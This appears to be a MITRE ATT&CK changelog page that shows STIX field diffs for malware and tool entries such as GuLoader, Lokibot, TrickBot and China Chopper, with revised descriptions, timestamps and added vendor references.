description[GuLoader](https://attack.mitre.org/software/S0561) is a file downloader that has been used since at least December 2019 to distribute a variety of remote administration tool (RAT) malware, including [NETWIRE](https://attack.mitre.org/software/S0198).(Citation: Unit 42 NETWIRE April 2020)[GuLoader](https://attack.mitre.org/software/S0561) is a file downloader that has been used since at least December 2019 to distribute a variety of remote administration tool (RAT) malware, including [NETWIRE](https://attack.mitre.org/software/S0198), [Agent Tesla](https://attack.mitre.org/software/S0331), [NanoCore](https://attack.mitre.org/software/S0336), FormBook, and Parallax RAT.(Citation: Unit 42 NETWIRE April 2020)(Citation: Medium Eli Salem GuLoader April 2021)
x_mitre_version1.02.0
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Medium Eli Salem GuLoader April 2021', 'description': 'Salem, E. (2021, April 19). Dancing With Shellcodes: Cracking the latest version of Guloader. Retrieved July 7, 2021.', 'url': 'https://elis531989.medium.com/dancing-with-shellcodes-cracking-the-latest-version-of-guloader-75083fb15cb4'}

[S0585] Kerrdown

Current version: 2.0

Version changed from: 1.0 → 2.0


Old Description
New Description
t1[Kerrdown](https://attack.mitre.org/software/S0585) is a dowt1[Kerrdown](https://attack.mitre.org/software/S0585) is a cus
>nloader used by [APT32](https://attack.mitre.org/groups/G005>tom downloader that has been used by [APT32](https://attack.
>0) to install spyware from a server on the victim's network.>mitre.org/groups/G0050) since at least 2018 to install spywa
>(Citation: Amnesty Intl. Ocean Lotus February 2021)>re from a server on the victim's network.(Citation: Amnesty 
 >Intl. Ocean Lotus February 2021)(Citation: Unit 42 KerrDown 
 >February 2019)
Details
values_changed
STIX FieldOld valueNew Value
modified2021-03-02 13:57:47.488000+00:002021-10-15 21:53:54.011000+00:00
description[Kerrdown](https://attack.mitre.org/software/S0585) is a downloader used by [APT32](https://attack.mitre.org/groups/G0050) to install spyware from a server on the victim's network.(Citation: Amnesty Intl. Ocean Lotus February 2021)[Kerrdown](https://attack.mitre.org/software/S0585) is a custom downloader that has been used by [APT32](https://attack.mitre.org/groups/G0050) since at least 2018 to install spyware from a server on the victim's network.(Citation: Amnesty Intl. Ocean Lotus February 2021)(Citation: Unit 42 KerrDown February 2019)
external_references[1]['url']https://www.amnesty.org/en/latest/news/2021/02/viet-nam-hacking-group-targets-activist/https://www.amnestyusa.org/wp-content/uploads/2021/02/Click-and-Bait_Vietnamese-Human-Rights-Defenders-Targeted-with-Spyware-Attacks.pdf
x_mitre_version1.02.0
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Unit 42 KerrDown February 2019', 'description': 'Ray, V. and Hayashi, K. (2019, February 1). Tracking OceanLotus’ new Downloader, KerrDown. Retrieved October 1, 2021.', 'url': 'https://unit42.paloaltonetworks.com/tracking-oceanlotus-new-downloader-kerrdown/'}

[S0447] Lokibot

Current version: 2.0

Version changed from: 1.0 → 2.0


Old Description
New Description
t1[Lokibot](https://attack.mitre.org/software/S0447) is a malwt1[Lokibot](https://attack.mitre.org/software/S0447) is a wide
>are designed to collect credentials and security tokens from>ly distributed information stealer that was first reported i
> an infected machine. [Lokibot](https://attack.mitre.org/sof>n 2015. It is designed to steal sensitive information such a
>tware/S0447) has also been used to establish backdoors in en>s usernames, passwords, cryptocurrency wallets, and other cr
>terprise environments.(Citation: Infoblox Lokibot January 20>edentials. [Lokibot](https://attack.mitre.org/software/S0447
>19)(Citation: Morphisec Lokibot April 2020)>) can also create a backdoor into infected systems to allow 
 >an attacker to install additional payloads.(Citation: Infobl
 >ox Lokibot January 2019)(Citation: Morphisec Lokibot April 2
 >020)(Citation: CISA Lokibot September 2020)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_contributors['Daniyal Naeem, BT Security']
dictionary_item_removed
STIX FieldOld valueNew Value
external_referenceshttps://insights.infoblox.com/threat-intelligence-reports/threat-intelligence--22
values_changed
STIX FieldOld valueNew Value
modified2020-05-18 22:00:40.499000+00:002021-10-11 17:43:38.029000+00:00
description[Lokibot](https://attack.mitre.org/software/S0447) is a malware designed to collect credentials and security tokens from an infected machine. [Lokibot](https://attack.mitre.org/software/S0447) has also been used to establish backdoors in enterprise environments.(Citation: Infoblox Lokibot January 2019)(Citation: Morphisec Lokibot April 2020)[Lokibot](https://attack.mitre.org/software/S0447) is a widely distributed information stealer that was first reported in 2015. It is designed to steal sensitive information such as usernames, passwords, cryptocurrency wallets, and other credentials. [Lokibot](https://attack.mitre.org/software/S0447) can also create a backdoor into infected systems to allow an attacker to install additional payloads.(Citation: Infoblox Lokibot January 2019)(Citation: Morphisec Lokibot April 2020)(Citation: CISA Lokibot September 2020)
external_references[1]['source_name']Infoblox Lokibot January 2019Lokibot
external_references[1]['description']Hoang, M. (2019, January 31). Malicious Activity Report: Elements of Lokibot Infostealer. Retrieved May 15, 2020.(Citation: Infoblox Lokibot January 2019)(Citation: Morphisec Lokibot April 2020)(Citation: Talos Lokibot Jan 2021)
external_references[2]['source_name']Morphisec Lokibot April 2020Infoblox Lokibot January 2019
external_references[2]['description']Cheruku, H. (2020, April 15). LOKIBOT WITH AUTOIT OBFUSCATOR + FRENCHY SHELLCODE. Retrieved May 14, 2020.Hoang, M. (2019, January 31). Malicious Activity Report: Elements of Lokibot Infostealer. Retrieved May 15, 2020.
external_references[2]['url']https://blog.morphisec.com/lokibot-with-autoit-obfuscator-frenchy-shellcodehttps://insights.infoblox.com/threat-intelligence-reports/threat-intelligence--22
x_mitre_version1.02.0
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Morphisec Lokibot April 2020', 'description': 'Cheruku, H. (2020, April 15). LOKIBOT WITH AUTOIT OBFUSCATOR + FRENCHY SHELLCODE. Retrieved May 14, 2020.', 'url': 'https://blog.morphisec.com/lokibot-with-autoit-obfuscator-frenchy-shellcode'}
external_references{'source_name': 'CISA Lokibot September 2020', 'description': 'DHS/CISA. (2020, September 22). Alert (AA20-266A) LokiBot Malware . Retrieved September 15, 2021.', 'url': 'https://us-cert.cisa.gov/ncas/alerts/aa20-266a'}
external_references{'source_name': 'Talos Lokibot Jan 2021', 'description': 'Muhammad, I., Unterbrink, H.. (2021, January 6). A Deep Dive into Lokibot Infection Chain. Retrieved August 31, 2021.', 'url': 'https://blog.talosintelligence.com/2021/01/a-deep-dive-into-lokibot-infection-chain.html'}

[S0455] Metamorfo

Current version: 2.0

Version changed from: 1.1 → 2.0


Old Description
New Description
t1[Metamorfo](https://attack.mitre.org/software/S0455) is a bat1[Metamorfo](https://attack.mitre.org/software/S0455) is a La
>nking trojan operated by a Brazilian cybercrime group that h>tin-American banking trojan operated by a Brazilian cybercri
>as been active since at least April 2018. The group focuses >me group that has been active since at least April 2018. The
>on targeting mostly Brazilian users.(Citation: Medium Metamo> group focuses on targeting banks and cryptocurrency service
>rfo Apr 2020)>s in Brazil and Mexico.(Citation: Medium Metamorfo Apr 2020)
 >(Citation: ESET Casbaneiro Oct 2019) 
Details
dictionary_item_removed
STIX FieldOld valueNew Value
external_referenceshttps://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767
values_changed
STIX FieldOld valueNew Value
modified2020-10-22 01:34:57.793000+00:002021-09-27 19:32:33.491000+00:00
description[Metamorfo](https://attack.mitre.org/software/S0455) is a banking trojan operated by a Brazilian cybercrime group that has been active since at least April 2018. The group focuses on targeting mostly Brazilian users.(Citation: Medium Metamorfo Apr 2020)[Metamorfo](https://attack.mitre.org/software/S0455) is a Latin-American banking trojan operated by a Brazilian cybercrime group that has been active since at least April 2018. The group focuses on targeting banks and cryptocurrency services in Brazil and Mexico.(Citation: Medium Metamorfo Apr 2020)(Citation: ESET Casbaneiro Oct 2019)
external_references[1]['description'](Citation: Medium Metamorfo Apr 2020)(Citation: Medium Metamorfo Apr 2020)(Citation: ESET Casbaneiro Oct 2019)
external_references[2]['source_name']Medium Metamorfo Apr 2020Casbaneiro
external_references[2]['description']Erlich, C. (2020, April 3). The Avast Abuser: Metamorfo Banking Malware Hides By Abusing Avast Executable. Retrieved May 26, 2020.(Citation: ESET Casbaneiro Oct 2019)
x_mitre_version1.12.0
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Medium Metamorfo Apr 2020', 'description': 'Erlich, C. (2020, April 3). The Avast Abuser: Metamorfo Banking Malware Hides By Abusing Avast Executable. Retrieved May 26, 2020.', 'url': 'https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767'}
external_references{'source_name': 'ESET Casbaneiro Oct 2019', 'description': 'ESET Research. (2019, October 3). Casbaneiro: peculiarities of this banking Trojan that affects Brazil and Mexico. Retrieved September 23, 2021.', 'url': 'https://www.welivesecurity.com/2019/10/03/casbaneiro-trojan-dangerous-cooking/'}
x_mitre_aliasesCasbaneiro
x_mitre_contributorsJose Luis Sánchez Martinez

[S0340] Octopus

Current version: 2.0

Version changed from: 1.1 → 2.0


Old Description
New Description
t1[Octopus](https://attack.mitre.org/software/S0340) is a Windt1[Octopus](https://attack.mitre.org/software/S0340) is a Wind
>ows Trojan.(Citation: Securelist Octopus Oct 2018)>ows Trojan written in the Delphi programming language that h
 >as been used by [Nomadic Octopus](https://attack.mitre.org/g
 >roups/G0133) to target government organizations in Central A
 >sia since at least 2014.(Citation: Securelist Octopus Oct 20
 >18)(Citation: Security Affairs DustSquad Oct 2018)(Citation:
 > ESET Nomadic Octopus 2018) 
Details
values_changed
STIX FieldOld valueNew Value
modified2020-03-20 18:57:08.610000+00:002021-10-15 02:42:45.953000+00:00
description[Octopus](https://attack.mitre.org/software/S0340) is a Windows Trojan.(Citation: Securelist Octopus Oct 2018)[Octopus](https://attack.mitre.org/software/S0340) is a Windows Trojan written in the Delphi programming language that has been used by [Nomadic Octopus](https://attack.mitre.org/groups/G0133) to target government organizations in Central Asia since at least 2014.(Citation: Securelist Octopus Oct 2018)(Citation: Security Affairs DustSquad Oct 2018)(Citation: ESET Nomadic Octopus 2018)
external_references[1]['description'](Citation: Securelist Octopus Oct 2018)(Citation: Securelist Octopus Oct 2018)(Citation: Security Affairs DustSquad Oct 2018)(Citation: ESET Nomadic Octopus 2018)
x_mitre_version1.12.0
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Security Affairs DustSquad Oct 2018', 'description': 'Paganini, P. (2018, October 16). Russia-linked APT group DustSquad targets diplomatic entities in Central Asia. Retrieved August 24, 2021.', 'url': 'https://securityaffairs.co/wordpress/77165/apt/russia-linked-apt-dustsquad.html'}
external_references{'source_name': 'ESET Nomadic Octopus 2018', 'description': 'Cherepanov, A. (2018, October 4). Nomadic Octopus Cyber espionage in Central Asia. Retrieved October 13, 2021.', 'url': 'https://www.virusbulletin.com/uploads/pdf/conference_slides/2018/Cherepanov-VB2018-Octopus.pdf'}

[S0011] Taidoor

Current version: 2.0

Version changed from: 1.1 → 2.0


Old Description
New Description
t1[Taidoor](https://attack.mitre.org/software/S0011) is malwart1[Taidoor](https://attack.mitre.org/software/S0011) is a remo
>e that has been used since at least 2010, primarily to targe>te access trojan (RAT) that has been used by Chinese governm
>t Taiwanese government organizations. (Citation: TrendMicro >ent cyber actors to maintain access on victim networks.(Cita
>Taidoor)>tion: CISA MAR-10292089-1.v2 TAIDOOR August 2021) [Taidoor](
 >https://attack.mitre.org/software/S0011) has primarily been 
 >used against Taiwanese government organizations since at lea
 >st 2010.(Citation: TrendMicro Taidoor)
Details
values_changed
STIX FieldOld valueNew Value
modified2020-03-30 18:21:09.468000+00:002021-10-15 12:34:22.853000+00:00
description[Taidoor](https://attack.mitre.org/software/S0011) is malware that has been used since at least 2010, primarily to target Taiwanese government organizations. (Citation: TrendMicro Taidoor)[Taidoor](https://attack.mitre.org/software/S0011) is a remote access trojan (RAT) that has been used by Chinese government cyber actors to maintain access on victim networks.(Citation: CISA MAR-10292089-1.v2 TAIDOOR August 2021) [Taidoor](https://attack.mitre.org/software/S0011) has primarily been used against Taiwanese government organizations since at least 2010.(Citation: TrendMicro Taidoor)
external_references[1]['source_name']TrendMicro TaidoorCISA MAR-10292089-1.v2 TAIDOOR August 2021
external_references[1]['description']Trend Micro. (2012). The Taidoor Campaign. Retrieved November 12, 2014.CISA, FBI, DOD. (2021, August). MAR-10292089-1.v2 – Chinese Remote Access Trojan: TAIDOOR. Retrieved August 24, 2021.
external_references[1]['url']http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_the_taidoor_campaign.pdfhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-216a
x_mitre_version1.12.0
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'TrendMicro Taidoor', 'description': 'Trend Micro. (2012). The Taidoor Campaign. Retrieved November 12, 2014.', 'url': 'http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_the_taidoor_campaign.pdf'}

[S0266] TrickBot

Current version: 2.0

Version changed from: 1.4 → 2.0


Old Description
New Description
t1[TrickBot](https://attack.mitre.org/software/S0266) is a Trot1[TrickBot](https://attack.mitre.org/software/S0266) is a Tro
>jan spyware program that has mainly been used for targeting >jan spyware program written in C++ that first emerged in Sep
>banking sites in United States, Canada, UK, Germany, Austral>tember 2016 as a possible successor to [Dyre](https://attack
>ia, Austria, Ireland, London, Switzerland, and Scotland. Tri>.mitre.org/software/S0024). [TrickBot](https://attack.mitre.
>ckBot first emerged in the wild in September 2016 and appear>org/software/S0266) was developed and initially used by [Wiz
>s to be a successor to [Dyre](https://attack.mitre.org/softw>ard Spider](https://attack.mitre.org/groups/G0102) for targe
>are/S0024). [TrickBot](https://attack.mitre.org/software/S02>ting banking sites in North America, Australia, and througho
>66) is developed in the C++ programming language. (Citation:>ut Europe; it has since been used against all sectors worldw
> S2 Grupo TrickBot June 2017) (Citation: Fidelis TrickBot Oc>ide as part of "big game hunting" ransomware campaigns.(Cita
>t 2016) (Citation: IBM TrickBot Nov 2016)>tion: S2 Grupo TrickBot June 2017)(Citation: Fidelis TrickBo
 >t Oct 2016)(Citation: IBM TrickBot Nov 2016)(Citation: Crowd
 >Strike Wizard Spider October 2020)
Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-10 13:35:22.920000+00:002021-10-01 14:19:20.660000+00:00
description[TrickBot](https://attack.mitre.org/software/S0266) is a Trojan spyware program that has mainly been used for targeting banking sites in United States, Canada, UK, Germany, Australia, Austria, Ireland, London, Switzerland, and Scotland. TrickBot first emerged in the wild in September 2016 and appears to be a successor to [Dyre](https://attack.mitre.org/software/S0024). [TrickBot](https://attack.mitre.org/software/S0266) is developed in the C++ programming language. (Citation: S2 Grupo TrickBot June 2017) (Citation: Fidelis TrickBot Oct 2016) (Citation: IBM TrickBot Nov 2016)[TrickBot](https://attack.mitre.org/software/S0266) is a Trojan spyware program written in C++ that first emerged in September 2016 as a possible successor to [Dyre](https://attack.mitre.org/software/S0024). [TrickBot](https://attack.mitre.org/software/S0266) was developed and initially used by [Wizard Spider](https://attack.mitre.org/groups/G0102) for targeting banking sites in North America, Australia, and throughout Europe; it has since been used against all sectors worldwide as part of "big game hunting" ransomware campaigns.(Citation: S2 Grupo TrickBot June 2017)(Citation: Fidelis TrickBot Oct 2016)(Citation: IBM TrickBot Nov 2016)(Citation: CrowdStrike Wizard Spider October 2020)
external_references[7]['source_name']Trend Micro Totbrick Oct 2016CrowdStrike Wizard Spider October 2020
external_references[7]['description']Antazo, F. (2016, October 31). TSPY_TRICKLOAD.N. Retrieved September 14, 2018.Podlosky, A., Hanel, A. et al. (2020, October 16). WIZARD SPIDER Update: Resilient, Reactive and Resolute. Retrieved June 15, 2021.
external_references[7]['url']https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/tspy_trickload.nhttps://www.crowdstrike.com/blog/wizard-spider-adversary-update/
external_references[8]['source_name']TrendMicro Trickbot Feb 2019Trend Micro Totbrick Oct 2016
external_references[8]['description']Llimos, N., Pascual, C.. (2019, February 12). Trickbot Adds Remote Application Credential-Grabbing Capabilities to Its Repertoire. Retrieved March 12, 2019.Antazo, F. (2016, October 31). TSPY_TRICKLOAD.N. Retrieved September 14, 2018.
external_references[8]['url']https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-adds-remote-application-credential-grabbing-capabilities-to-its-repertoire/https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/tspy_trickload.n
external_references[9]['source_name']Microsoft Totbrick Oct 2017TrendMicro Trickbot Feb 2019
external_references[9]['description']Pornasdoro, A. (2017, October 12). Trojan:Win32/Totbrick. Retrieved September 14, 2018.Llimos, N., Pascual, C.. (2019, February 12). Trickbot Adds Remote Application Credential-Grabbing Capabilities to Its Repertoire. Retrieved March 12, 2019.
external_references[9]['url']https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/Totbrickhttps://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-adds-remote-application-credential-grabbing-capabilities-to-its-repertoire/
x_mitre_version1.42.0
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Microsoft Totbrick Oct 2017', 'description': 'Pornasdoro, A. (2017, October 12). Trojan:Win32/Totbrick. Retrieved September 14, 2018.', 'url': 'https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/Totbrick'}
Minor Version Changes

[S0456] Aria-body

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1[Aria-body](https://attack.mitre.org/software/S0456) is a cut1[Aria-body](https://attack.mitre.org/software/S0456) is a cu
>stom backdoor that has been used by [Naikon](https://attack.>stom backdoor that has been used by [Naikon](https://attack.
>mitre.org/groups/G0019).(Citation: CheckPoint Naikon May 202>mitre.org/groups/G0019) since approximately 2017.(Citation: 
>0)>CheckPoint Naikon May 2020)
Details
values_changed
STIX FieldOld valueNew Value
modified2020-07-03 21:52:44.685000+00:002021-08-19 17:58:43.342000+00:00
description[Aria-body](https://attack.mitre.org/software/S0456) is a custom backdoor that has been used by [Naikon](https://attack.mitre.org/groups/G0019).(Citation: CheckPoint Naikon May 2020)[Aria-body](https://attack.mitre.org/software/S0456) is a custom backdoor that has been used by [Naikon](https://attack.mitre.org/groups/G0019) since approximately 2017.(Citation: CheckPoint Naikon May 2020)
x_mitre_version1.01.1

[S0534] Bazar

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1[Bazar](https://attack.mitre.org/software/S0534) is a downlot1[Bazar](https://attack.mitre.org/software/S0534) is a downlo
>ader and backdoor malware in use since at least April 2020, >ader and backdoor that has been used since at least April 20
>with infections mainly targeting professional services, heal>20, with infections primarily against professional services,
>thcare, manufacturing, IT, logistics and travel companies ac> healthcare, manufacturing, IT, logistics and travel compani
>ross the US and Europe. [Bazar](https://attack.mitre.org/sof>es across the US and Europe. [Bazar](https://attack.mitre.or
>tware/S0534) has been reported to have ties to [TrickBot](ht>g/software/S0534) reportedly has ties to [TrickBot](https://
>tps://attack.mitre.org/software/S0266) campaigns and can be >attack.mitre.org/software/S0266) campaigns and can be used t
>used to deploy additional malware, including ransomware, and>o deploy additional malware, including ransomware, and to st
> to steal sensitive data.(Citation: Cybereason Bazar July 20>eal sensitive data.(Citation: Cybereason Bazar July 2020)
>20) 
Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-16 21:43:13.433000+00:002021-08-18 19:43:00.355000+00:00
description[Bazar](https://attack.mitre.org/software/S0534) is a downloader and backdoor malware in use since at least April 2020, with infections mainly targeting professional services, healthcare, manufacturing, IT, logistics and travel companies across the US and Europe. [Bazar](https://attack.mitre.org/software/S0534) has been reported to have ties to [TrickBot](https://attack.mitre.org/software/S0266) campaigns and can be used to deploy additional malware, including ransomware, and to steal sensitive data.(Citation: Cybereason Bazar July 2020)[Bazar](https://attack.mitre.org/software/S0534) is a downloader and backdoor that has been used since at least April 2020, with infections primarily against professional services, healthcare, manufacturing, IT, logistics and travel companies across the US and Europe. [Bazar](https://attack.mitre.org/software/S0534) reportedly has ties to [TrickBot](https://attack.mitre.org/software/S0266) campaigns and can be used to deploy additional malware, including ransomware, and to steal sensitive data.(Citation: Cybereason Bazar July 2020)
external_references[1]['description'](Citation: FireEye KEGTAP SINGLEMALT October 2020)(Citation: FireEye KEGTAP SINGLEMALT October 2020)(Citation: CrowdStrike Wizard Spider October 2020)
external_references[5]['source_name']NCC Group Team9 June 2020CrowdStrike Wizard Spider October 2020
external_references[5]['description']Pantazopoulos, N. (2020, June 2). In-depth analysis of the new Team9 malware family. Retrieved December 1, 2020.Podlosky, A., Hanel, A. et al. (2020, October 16). WIZARD SPIDER Update: Resilient, Reactive and Resolute. Retrieved June 15, 2021.
external_references[5]['url']https://research.nccgroup.com/2020/06/02/in-depth-analysis-of-the-new-team9-malware-family/https://www.crowdstrike.com/blog/wizard-spider-adversary-update/
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'NCC Group Team9 June 2020', 'description': 'Pantazopoulos, N. (2020, June 2). In-depth analysis of the new Team9 malware family. Retrieved December 1, 2020.', 'url': 'https://research.nccgroup.com/2020/06/02/in-depth-analysis-of-the-new-team9-malware-family/'}

[S0268] Bisonal

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1[Bisonal](https://attack.mitre.org/software/S0268) is malwart1[Bisonal](https://attack.mitre.org/software/S0268) is malwar
>e that has been used in attacks against targets in Russia, S>e that has been used in attacks against targets in Russia, S
>outh Korea, and Japan. It has been observed in the wild sinc>outh Korea, and Japan. It has been observed in the wild sinc
>e 2014. (Citation: Unit 42 Bisonal July 2018)>e 2014.(Citation: Unit 42 Bisonal July 2018)
Details
values_changed
STIX FieldOld valueNew Value
modified2020-03-30 18:38:49.119000+00:002021-10-17 16:05:26.618000+00:00
description[Bisonal](https://attack.mitre.org/software/S0268) is malware that has been used in attacks against targets in Russia, South Korea, and Japan. It has been observed in the wild since 2014. (Citation: Unit 42 Bisonal July 2018)[Bisonal](https://attack.mitre.org/software/S0268) is malware that has been used in attacks against targets in Russia, South Korea, and Japan. It has been observed in the wild since 2014.(Citation: Unit 42 Bisonal July 2018)
x_mitre_version1.11.2

[S0521] BloodHound

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2020-11-24 20:08:25.559000+00:002021-10-14 23:23:19.517000+00:00
x_mitre_version1.01.1

[S0482] Bundlore

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2020-07-06 15:18:53.409000+00:002021-10-16 20:26:31.452000+00:00
x_mitre_version1.01.1

[S0484] Carberp

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2020-08-10 21:37:48.548000+00:002021-08-25 20:08:29.545000+00:00
x_mitre_version1.01.1

[S0020] China Chopper

Current version: 2.3

Version changed from: 2.2 → 2.3


Old Description
New Description
t1[China Chopper](https://attack.mitre.org/software/S0020) is t1[China Chopper](https://attack.mitre.org/software/S0020) is 
>a [Web Shell](https://attack.mitre.org/techniques/T1505/003)>a [Web Shell](https://attack.mitre.org/techniques/T1505/003)
> hosted on Web servers to provide access back into an enterp> hosted on Web servers to provide access back into an enterp
>rise network that does not rely on an infected system callin>rise network that does not rely on an infected system callin
>g back to a remote command and control server. (Citation: Le>g back to a remote command and control server. (Citation: Le
>e 2013) It has been used by several threat groups. (Citation>e 2013) It has been used by several threat groups. (Citation
>: Dell TG-3390) (Citation: FireEye Periscope March 2018)>: Dell TG-3390) (Citation: FireEye Periscope March 2018)(Cit
 >ation: CISA AA21-200A APT40 July 2021)
Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-23 19:53:58.719000+00:002021-10-17 14:30:11.979000+00:00
description[China Chopper](https://attack.mitre.org/software/S0020) is a [Web Shell](https://attack.mitre.org/techniques/T1505/003) hosted on Web servers to provide access back into an enterprise network that does not rely on an infected system calling back to a remote command and control server. (Citation: Lee 2013) It has been used by several threat groups. (Citation: Dell TG-3390) (Citation: FireEye Periscope March 2018)[China Chopper](https://attack.mitre.org/software/S0020) is a [Web Shell](https://attack.mitre.org/techniques/T1505/003) hosted on Web servers to provide access back into an enterprise network that does not rely on an infected system calling back to a remote command and control server. (Citation: Lee 2013) It has been used by several threat groups. (Citation: Dell TG-3390) (Citation: FireEye Periscope March 2018)(Citation: CISA AA21-200A APT40 July 2021)
x_mitre_version2.22.3
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'CISA AA21-200A APT40 July 2021', 'description': 'CISA. (2021, July 19). (AA21-200A) Joint Cybersecurity Advisory – Tactics, Techniques, and Procedures of Indicted APT40 Actors Associated with China’s MSS Hainan State Security Department.. Retrieved August 12, 2021.', 'url': 'https://us-cert.cisa.gov/ncas/alerts/aa21-200a'}

[S0154] Cobalt Strike

Current version: 1.7

Version changed from: 1.6 → 1.7

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-24 23:29:30.707000+00:002021-10-18 20:08:21.958000+00:00
x_mitre_version1.61.7
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_platformsLinux
x_mitre_platformsmacOS

[S0575] Conti

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-27 02:50:43.404000+00:002021-06-21 21:05:27.228000+00:00
x_mitre_version1.01.1

[S0115] Crimson

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1[Crimson](https://attack.mitre.org/software/S0115) is malwart1[Crimson](https://attack.mitre.org/software/S0115) is a remo
>e used as part of a campaign known as Operation Transparent >te access Trojan that has been used by [Transparent Tribe](h
>Tribe that targeted Indian diplomatic and military victims. >ttps://attack.mitre.org/groups/G0134) since at least 2016.(C
>(Citation: Proofpoint Operation Transparent Tribe March 2016>itation: Proofpoint Operation Transparent Tribe March 2016)(
>)>Citation: Kaspersky Transparent Tribe August 2020)
Details
dictionary_item_removed
STIX FieldOld valueNew Value
external_referenceshttps://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf
values_changed
STIX FieldOld valueNew Value
modified2020-03-30 15:25:59.334000+00:002021-10-15 18:54:53.268000+00:00
description[Crimson](https://attack.mitre.org/software/S0115) is malware used as part of a campaign known as Operation Transparent Tribe that targeted Indian diplomatic and military victims. (Citation: Proofpoint Operation Transparent Tribe March 2016)[Crimson](https://attack.mitre.org/software/S0115) is a remote access Trojan that has been used by [Transparent Tribe](https://attack.mitre.org/groups/G0134) since at least 2016.(Citation: Proofpoint Operation Transparent Tribe March 2016)(Citation: Kaspersky Transparent Tribe August 2020)
external_references[1]['source_name']Proofpoint Operation Transparent Tribe March 2016MSIL/Crimson
external_references[1]['description']Huss, D.. (2016, March 1). Operation Transparent Tribe. Retrieved June 8, 2016.(Citation: Proofpoint Operation Transparent Tribe March 2016)
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Proofpoint Operation Transparent Tribe March 2016', 'description': 'Huss, D. (2016, March 1). Operation Transparent Tribe. Retrieved June 8, 2016.', 'url': 'https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf'}
external_references{'source_name': 'Kaspersky Transparent Tribe August 2020', 'description': 'Dedola, G. (2020, August 20). Transparent Tribe: Evolution analysis, part 1. Retrieved September 2, 2021.', 'url': 'https://securelist.com/transparent-tribe-part-1/98127/'}

[S0547] DropBook

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-19 22:06:49.021000+00:002021-08-18 23:44:04.697000+00:00
x_mitre_version1.01.1

[S0082] Emissary

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX FieldOld valueNew Value
modified2020-03-20 17:06:41.399000+00:002021-08-09 14:21:48.477000+00:00
x_mitre_version1.11.2

[S0363] Empire

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-09 14:53:15.168000+00:002021-08-11 14:58:57.587000+00:00
x_mitre_version1.21.3

[S0512] FatDuke

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2020-10-09 16:08:00.074000+00:002021-10-16 01:45:28.826000+00:00
x_mitre_version1.01.1

[S0601] Hildegard

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-12 12:51:56.886000+00:002021-10-16 01:49:39.189000+00:00
x_mitre_version1.01.1

[S0357] Impacket

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX FieldOld valueNew Value
modified2020-03-31 22:20:17.889000+00:002021-10-07 16:02:38.320000+00:00
x_mitre_version1.11.2

[S0276] Keydnap

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX FieldOld valueNew Value
modified2020-03-30 16:55:01.985000+00:002021-10-17 14:35:31.022000+00:00
x_mitre_version1.11.2

[S0599] Kinsing

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1[Kinsing](https://attack.mitre.org/software/S0599) is Golangt1[Kinsing](https://attack.mitre.org/software/S0599) is Golang
>-based malware that runs a cryptocurrency miner and attempts>-based malware that runs a cryptocurrency miner and attempts
> to spread itself to other hosts in the victim environment. > to spread itself to other hosts in the victim environment. 
>(Citation: Aqua Kinsing April 2020)(Citation: Sysdig Kinsing>(Citation: Aqua Kinsing April 2020)(Citation: Sysdig Kinsing
> November 2020)> November 2020)(Citation: Aqua Security Cloud Native Threat 
 >Report June 2021)
Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-12 12:49:39.027000+00:002021-08-26 16:39:07.873000+00:00
